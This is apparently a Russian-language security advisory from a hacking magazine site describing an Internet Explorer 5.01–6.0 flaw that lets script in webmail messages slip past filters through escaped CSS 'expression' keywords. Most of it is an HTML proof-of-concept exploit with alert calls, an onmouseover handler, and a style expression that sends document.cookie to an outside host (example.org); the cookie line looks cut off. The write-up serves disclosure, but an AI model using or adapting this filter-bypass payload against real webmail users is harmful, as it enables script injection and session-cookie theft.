Хакер #305. Многошаговые SQL-инъекции
Программа: Microsoft Internet Explorer 5.01-6.0 в комбинации с Web mail системами
Уязвимость обнаружена в некоторых Webmail системах в комбинации с Microsoft Internet Explorer. Удаленный атакующий может выполнить произвольный код сценария в почтовом HTML сообщении при его просмотре в Webmail системе, в обход существующих механизмов фильтрации.
Удаленный атакующий может вставить произвольный javascript код в таблицу стилей через ключевое слово "expression" используя определенную методику, чтобы обойти существующие механизмы фильтрации javascript кода в большинстве Webmail системах. Уязвимость работает только в Microsoft Internet Explorer.
Пример/Эксплоит:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
<head>
<title>Webmail test</title>
<meta http-equiv="Content-Type"
content="text/html;charset=ISO-8859-1" />
</head>
<body style="width:expres\sion(alert(1))">
<style type="text/css">
h1 {
he\ight:e\xpression(alert(2));
bac\kground-image:e\xpression('url(http://example.org/'+document.cook
ie+$
}
</style>
<h1 style="width:expression(alert(3))">...</h1>
<div id="just-for-fun">
<a href="https://xakep.ru/wp-content/uploads/post/20030/javascript:window.open(document.location);"
onmouseover="alert(4)">fireworks</a>
</div>
</body>
</html>